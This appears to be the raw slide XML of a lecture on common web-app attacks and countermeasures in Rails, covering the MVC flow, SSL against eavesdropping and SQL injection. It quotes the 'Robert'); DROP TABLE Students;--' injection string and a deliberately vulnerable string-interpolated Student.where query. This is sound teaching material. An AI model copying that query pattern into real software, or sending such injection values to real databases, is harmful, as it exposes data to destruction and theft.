              <a:ext cx="1161698" cy="603307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102638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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Can 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851"/>
            </a:xfrm>
            <a:prstGeom prst="can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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968"/>
            </a:xfrm>
            <a:prstGeom prst="cloud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" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="3162734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9" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="3162734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3"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="639356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1615279" y="4757967"/>
              <a:ext cx="573007" cy="10715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2003718" y="4757967"/>
              <a:ext cx="447549" cy="10715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902436" y="4757967"/>
              <a:ext cx="579040" cy="10715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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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1376426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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290776" y="5829484"/>
              <a:ext cx="1160492" cy="60145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120782" y="5940523"/>
              <a:ext cx="1160492" cy="603307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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="603307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4281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="711736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483" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1351798" y="1839414"/>
              <a:ext cx="718151" cy="753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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19484" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1265192" y="326429"/>
              <a:ext cx="726043" cy="43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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19485" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="394758" y="4045653"/>
              <a:ext cx="989936" cy="43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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19486" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256313" y="4074676"/>
              <a:ext cx="855798" cy="43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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19487" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1621956" y="5857623"/>
              <a:ext cx="492703" cy="43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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19488" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3345857" y="5835323"/>
              <a:ext cx="603210" cy="43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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19489" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5296316" y="5932871"/>
              <a:ext cx="343751" cy="43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DB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6262687" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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6450012" y="417513"/>
            <a:ext cx="3843338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How to prevent?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20482" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2157413" y="617539"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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144859" y="4091738"/>
              <a:ext cx="1160492" cy="601457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1223" y="262777"/>
              <a:ext cx="1160492" cy="601456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0" y="3716060"/>
              <a:ext cx="4696252" cy="3225655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1583" y="4026967"/>
              <a:ext cx="1161698" cy="603307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102638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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Can 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851"/>
            </a:xfrm>
            <a:prstGeom prst="can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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968"/>
            </a:xfrm>
            <a:prstGeom prst="cloud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" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="3162734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9" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="3162734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3"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="639356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1615279" y="4757967"/>
              <a:ext cx="573007" cy="10715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2003718" y="4757967"/>
              <a:ext cx="447549" cy="10715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902436" y="4757967"/>
              <a:ext cx="579040" cy="10715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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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1376426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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290776" y="5829484"/>
              <a:ext cx="1160492" cy="60145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120782" y="5940523"/>
              <a:ext cx="1160492" cy="603307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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="603307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4281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="711736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08" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1351798" y="1839414"/>
              <a:ext cx="718151" cy="753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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20509" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1265192" y="326429"/>
              <a:ext cx="726043" cy="43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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20510" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="394758" y="4045653"/>
              <a:ext cx="989936" cy="43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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20511" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256313" y="4074676"/>
              <a:ext cx="855798" cy="43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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20512" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1621956" y="5857623"/>
              <a:ext cx="492703" cy="43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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20513" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3345857" y="5835323"/>
              <a:ext cx="603210" cy="43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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20514" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5296316" y="5932871"/>
              <a:ext cx="343751" cy="43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>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6262687" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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7000875" y="1646238"/>
            <a:ext cx="3048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>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt communications with SSL (HTTPS)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How to enable site-wide SSL in Rails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="5070475"/>
            <a:ext cx="8229600" cy="94615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Also requires config on production server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>E.g.: Signed certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2150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1662113"/>
            <a:ext cx="9144000" cy="322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TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5290580" y="6367958"/>
            <a:ext cx="53758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dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Taken from https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.railstutorial.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/book/ (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ed.) Listing 7.26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dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See also http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guides.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configuring.html#rails-general-configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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Three Common Web App Attacks and Countermeasures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FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Eavesdropping on network communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Encrypt communications with SSL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1529" y="1880943"/>
            <a:ext cx="3628715" cy="3237657"/>
            <a:chOff x="421639" y="1880540"/>
            <a:chExt cx="3629660" cy="3238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639" y="1880540"/>
              <a:ext cx="3629401" cy="323798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6895" y="3148584"/>
              <a:ext cx="902207" cy="8930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964660" y="1935106"/>
            <a:ext cx="6836534" cy="25146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defTabSz="914126"/>
            <a:endParaRPr sz="2899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914126"/>
            <a:endParaRPr sz="2899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914126"/>
            <a:endParaRPr sz="2899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914126"/>
            <a:endParaRPr sz="2899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914126">
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2349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91413" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="2399" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" b="1" spc="-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399" b="1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399" b="1" spc="-3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399" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" b="1" spc="2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399" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" b="1" spc="-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399" b="1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72277" y="4717205"/>
            <a:ext cx="6519752" cy="1455041"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6521450" h="1455420">
                <a:moveTo>
                  <a:pt x="0" y="1455419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521196" y="1455419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1455419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25908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pPr defTabSz="914126"/>
            <a:endParaRPr sz="1799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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="0"/>
            <a:ext cx="82296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Why were the student records lost?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2412" y="1169989"/>
            <a:ext cx="9144000" cy="29305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9761537" y="3071813"/>
            <a:ext cx="1595438" cy="277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charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>http://xkcd.com/327/</a:t>
            </a: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2" y="1349375"/>
            <a:ext cx="845820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8716962" y="1677988"/>
            <a:ext cx="1231900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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251826" y="1931988"/>
            <a:ext cx="1957387" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="0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Why were the student records lost?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2412" y="1169989"/>
            <a:ext cx="9144000" cy="29305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9761537" y="3071813"/>
            <a:ext cx="1595438" cy="277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charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24580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2" y="1349375"/>
            <a:ext cx="845820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243137" y="4427538"/>
            <a:ext cx="7702550" cy="18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FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The name string “Robert'); DROP TABLE Students;--”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> malicious code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rgbClr val="FF00FF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FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But how can this happen?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8716962" y="1677988"/>
            <a:ext cx="1231900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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251826" y="1931988"/>
            <a:ext cx="1957387" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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34434" y="2173748"/>
            <a:ext cx="1295604" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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26495" y="2427748"/>
            <a:ext cx="1451026" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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Imagine controller that looks up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>students by name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2262187" y="1822450"/>
            <a:ext cx="684354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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where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("name = '#{id}'")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Imagine controller that looks up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>students by name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2262187" y="1822450"/>
            <a:ext cx="684354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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where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("name = '#{id}'")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201862" y="3141031"/>
            <a:ext cx="7742238" cy="2827338"/>
            <a:chOff x="679680" y="2753398"/>
            <a:chExt cx="7742227" cy="2826788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26628" name="TextBox 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="679681" y="4626079"/>
              <a:ext cx="7742226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>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>SELECT * FROM students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>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>WHERE name = '</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="00FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>Robert</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>';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79680" y="2753398"/>
              <a:ext cx="6838940" cy="453937"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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>
              <a:off x="4099150" y="3207335"/>
              <a:ext cx="0" cy="1418949"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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631" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4265816" y="3457971"/>
              <a:ext cx="383798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>
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Rails ORM translates to…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What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27650" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
